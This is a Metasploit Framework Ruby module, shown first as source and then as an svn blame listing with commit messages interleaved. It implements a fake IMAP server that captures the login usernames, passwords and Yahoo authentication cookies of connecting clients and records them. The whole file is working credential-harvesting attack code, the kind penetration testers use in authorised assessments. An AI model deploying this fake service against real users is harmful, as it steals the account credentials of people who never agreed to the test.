metasploit-framework/modules/auxiliary/server/capture/imap.rb

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::TcpServer
	include Msf::Auxiliary::Report

	
	def initialize
		super(
			'Name'        => 'Authentication Capture: IMAP',
			'Version'     => '$Revision$',
			'Description'    => %q{
				This module provides a fake IMAP service that
			is designed to capture authentication credentials.
			},
			'Author'      => ['ddz', 'hdm'],
			'License'     => MSF_LICENSE,
			'Actions'     =>
				[
				 	[ 'Capture' ]
				],
			'PassiveActions' => 
				[
					'Capture'
				],
			'DefaultAction'  => 'Capture'
		)

		register_options(
			[
				OptPort.new('SRVPORT',    [ true, "The local port to listen on.", 143 ])
			], self.class)
	end

	def setup
		super
		@state = {}
	end

	def run
		exploit()
	end
	
	def on_client_connect(c)
		@state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}
		c.put "* OK IMAP4\r\n"
	end
	
	def on_client_data(c)
		data = c.get_once
		return if not data
		num,cmd,arg = data.strip.split(/\s+/, 3)
		arg ||= ""
		
		
		if(cmd.upcase == "CAPABILITY") 
			c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n"
			c.put "#{num} OK CAPABILITY completed.\r\n"
		end
		
		if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI")
			c.put "+ \r\n"
			cookie1 = c.get_once
			c.put "+ \r\n"
			cookie2 = c.get_once
			report_auth_info(
				:host      => @state[c][:ip],
				:proto     => 'imap-yahoo',
				:targ_host => datastore['SRVHOST'],
				:targ_port => datastore['SRVPORT'],
				:user      => cookie1,
				:pass      => cookie2
			)
			return	
		end
		
		if(cmd.upcase == "LOGIN")
			@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)

			report_auth_info(
				:host      => @state[c][:ip],
				:proto     => 'imap',
				:targ_host => datastore['SRVHOST'],
				:targ_port => datastore['SRVPORT'],
				:user      => @state[c][:user],
				:pass      => @state[c][:pass]
			)
			print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
			return
		end
		
		if(cmd.upcase == "LOGOUT")
			c.put("* BYE IMAP4rev1 Server logging out\r\n")
			c.put("#{num} OK LOGOUT completed\r\n")
			return
		end

		@state[c][:pass] = data.strip
		c.put "#{num} NO LOGIN FAILURE\r\n"
		return
							
	end
	
	def on_client_close(c)
		@state.delete(c)
	end


end
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`##`
Importing two new wireless DoS modules, setting svn:keywords flags where needed. git-svn-id: file:///home/svn/framework3/trunk@5482 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-21 05:27:06 +00:00			`# $Id$`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`##`

			`##`
			`# This file is part of the Metasploit Framework and may be subject to`
			`# redistribution and commercial restrictions. Please see the Metasploit`
			`# Framework web site for more information on licensing and terms of use.`
replacing defunct framework URL in header comments in most modules and pcap_log git-svn-id: file:///home/svn/framework3/trunk@6479 4d416f70-5f16-0410-b530-b9f4589650da 2009-04-13 14:33:26 +00:00			`# http://metasploit.com/framework/`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`##`


			`require 'msf/core'`


This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`class Metasploit3 < Msf::Auxiliary`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. git-svn-id: file:///home/svn/framework3/trunk@5709 4d416f70-5f16-0410-b530-b9f4589650da 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::TcpServer`
			`include Msf::Auxiliary::Report`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00

			`def initialize`
			`super(`
			`'Name' => 'Authentication Capture: IMAP',`
Importing two new wireless DoS modules, setting svn:keywords flags where needed. git-svn-id: file:///home/svn/framework3/trunk@5482 4d416f70-5f16-0410-b530-b9f4589650da 2008-04-21 05:27:06 +00:00			`'Version' => '$Revision$',`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`'Description' => %q{`
			`This module provides a fake IMAP service that`
			`is designed to capture authentication credentials.`
			`},`
			`'Author' => ['ddz', 'hdm'],`
			`'License' => MSF_LICENSE,`
			`'Actions' =>`
			`[`
			`[ 'Capture' ]`
			`],`
			`'PassiveActions' =>`
			`[`
			`'Capture'`
			`],`
			`'DefaultAction' => 'Capture'`
			`)`

			`register_options(`
			`[`
			`OptPort.new('SRVPORT', [ true, "The local port to listen on.", 143 ])`
			`], self.class)`
			`end`

			`def setup`
			`super`
			`@state = {}`
			`end`

			`def run`
			`exploit()`
			`end`

			`def on_client_connect(c)`
			`@state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}`
First batch of karmetasploit updates git-svn-id: file:///home/svn/framework3/trunk@5618 4d416f70-5f16-0410-b530-b9f4589650da 2008-08-08 06:00:30 +00:00			`c.put "* OK IMAP4\r\n"`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`end`

			`def on_client_data(c)`
			`data = c.get_once`
			`return if not data`
			`num,cmd,arg = data.strip.split(/\s+/, 3)`
			`arg \|\|= ""`

First batch of karmetasploit updates git-svn-id: file:///home/svn/framework3/trunk@5618 4d416f70-5f16-0410-b530-b9f4589650da 2008-08-08 06:00:30 +00:00
			`if(cmd.upcase == "CAPABILITY")`
Adds support for Yahoo! IMAP cookies (thanks Mario De Tore!) fixes a cpu eating loop in the HTTP service. git-svn-id: file:///home/svn/framework3/trunk@6402 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 05:51:18 +00:00			`c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 AUTH=XYMPKI AUTH=XYMECOOKIE ID\r\n"`
First batch of karmetasploit updates git-svn-id: file:///home/svn/framework3/trunk@5618 4d416f70-5f16-0410-b530-b9f4589650da 2008-08-08 06:00:30 +00:00			`c.put "#{num} OK CAPABILITY completed.\r\n"`
			`end`

Adds support for Yahoo! IMAP cookies (thanks Mario De Tore!) fixes a cpu eating loop in the HTTP service. git-svn-id: file:///home/svn/framework3/trunk@6402 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 05:51:18 +00:00			`if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI")`
			`c.put "+ \r\n"`
			`cookie1 = c.get_once`
			`c.put "+ \r\n"`
			`cookie2 = c.get_once`
			`report_auth_info(`
			`:host => @state[c][:ip],`
			`:proto => 'imap-yahoo',`
			`:targ_host => datastore['SRVHOST'],`
			`:targ_port => datastore['SRVPORT'],`
			`:user => cookie1,`
			`:pass => cookie2`
			`)`
			`return`
			`end`

Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`if(cmd.upcase == "LOGIN")`
			`@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)`

			`report_auth_info(`
			`:host => @state[c][:ip],`
			`:proto => 'imap',`
			`:targ_host => datastore['SRVHOST'],`
			`:targ_port => datastore['SRVPORT'],`
			`:user => @state[c][:user],`
			`:pass => @state[c][:pass]`
			`)`
			`print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")`
Adds support for Yahoo! IMAP cookies (thanks Mario De Tore!) fixes a cpu eating loop in the HTTP service. git-svn-id: file:///home/svn/framework3/trunk@6402 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 05:51:18 +00:00			`return`
			`end`

			`if(cmd.upcase == "LOGOUT")`
			`c.put("* BYE IMAP4rev1 Server logging out\r\n")`
			`c.put("#{num} OK LOGOUT completed\r\n")`
			`return`
Lots of updates related to <secret project X>. git-svn-id: file:///home/svn/framework3/trunk@5424 4d416f70-5f16-0410-b530-b9f4589650da 2008-03-02 04:46:13 +00:00			`end`

			`@state[c][:pass] = data.strip`
			`c.put "#{num} NO LOGIN FAILURE\r\n"`
			`return`

			`end`

			`def on_client_close(c)`
			`@state.delete(c)`
			`end`


Adds support for Yahoo! IMAP cookies (thanks Mario De Tore!) fixes a cpu eating loop in the HTTP service. git-svn-id: file:///home/svn/framework3/trunk@6402 4d416f70-5f16-0410-b530-b9f4589650da 2009-03-28 05:51:18 +00:00			`end`